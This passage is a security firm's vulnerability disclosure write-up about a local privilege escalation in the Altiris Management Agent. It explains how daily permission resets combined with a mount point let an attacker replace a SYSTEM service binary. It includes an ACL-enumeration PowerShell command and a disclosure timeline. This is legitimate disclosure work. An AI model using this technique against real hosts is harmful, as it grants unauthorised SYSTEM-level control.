Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation


When reviewing the timestamp on these folders, it appeared there was activity happening once a day within this folder. After doing further research into the folders, we concluded that these files were likely modified after a system or software inventory scan. Now, depending on the relevant organisations configuration and appetite for inventory management, this may happen more or less than once per day.

Here’s where the fun begins. Having ‘Everyone – Full Control’ permissions on a folder can be of great interest, but sometimes you can go down a rabbit hole that leads to nowhere, other than access to the files themselves. Nevertheless, we jumped headfirst down that rabbit hole.

It’s worth noting that once we found this behaviour, we went back to a recent vulnerability disclosure against Cylance (awesome post by Ryan Hanson incoming) to see if this type of attack would be possible here:

Here is the folder permissions that we identified on the ‘NSI’ folder. These permissions were also the same on the ‘Outbox’ folder.

We then attempted to redirect the folder to another location using James Forshaw’s symboliclink-testing-tools to create a mount point to another folder and see if those files were written, which was successful. It was also possible to use the junction tools from sysinternals ( The only problem with the sysinternals junction tool is that it requires the source folder to not exist, whereas in our case the folder was already there with ‘Everyone’ permissions. An example of this is shown below:

If we were to completely delete this folder we would not have the correct permissions to recreate this attack. James Forshaw’s toolkit allows the existing folder to be overwritten rather than starting from scratch, as shown below:

Another tool that could be used for this type of attack is called mklink.exe from Windows, but this requires elevated privileges, which would not have been possible in this situation (the point is that we’re attempting to gain elevated privileges).

To completely understand what process was overwriting these permissions, we uploaded Process Monitor from sysinternals ( to see what was going on under the hood. As you can see from the output below, all files and folders were getting a DACL applied by the AeXNSAgent.exe.

Analysis – Weaponisation

So how can we weaponise this? There are multiple ways you could choose to make this vulnerability exploitable, but the path of least resistance was trying to override the entire root Altiris folder (“C:\Program Files\Altiris\Alritis Agent\”) permissions so that we could modify the service binary running under the SYSTEM account, namely AeNXSAgent.exe.

The following screenshots show the permissions applied to the ‘Altiris Agent’ folder and the AeNXSAgent.exe service binary, before modifying the mount point to overwrite the permissions:

We then created a mountpoint which points to the folder ‘Altiris Agent’. It’s worth noting that this folder must be empty for the redirection to be possible. Since we have full permissions over every file, this was trivial to complete. The mount point was created and verified using James Forshaw’s symboliclink-testing-tools.

We then waited for the next scan to run, which was the following morning, and the next screenshot shows the outcome. As we expected the ‘Everyone – Full Control’ permission was applied to the root folder and everything under it, including the AeNXSAgent.exe.

Once we had full control over AeXNSAgent.exe we could then replace the service binary and reboot the host to obtain SYSTEM level privileges. It is worth noting that privilege escalation vulnerabilities in symlinks are fairly common and James Forshaw himself has found well over twenty as shown here:


This vulnerability affected all versions of Altiris Management Agent, namely up to v7.6, v8.0 and 8.1 RU7. We strongly recommend you apply all patches immediately.

If you have more ideas about exploiting this or similar vulnerabilities on run-time and/or in other ways, then please share them with the community and let us know your thoughts.

Disclosure Timeline

  • Vendor contacted – 31 May 2018
  • Vendor assigned Tracking ID – 31 May 2018
  • Vendor confirmed 60 day disclosure – 31 May 2018
  • Vendor acknowledged vulnerability in v7.6, 8.0, 8.1 RU7 – 12 June 2018
  • Vendor confirmed fix for all four releases – 16 July 2018
  • CVE issued by participating CNA – 23 July 2018
  • Vendor publicly disclosed ( – 25 July 2018
  • Nettitude release further information – 12 September 2018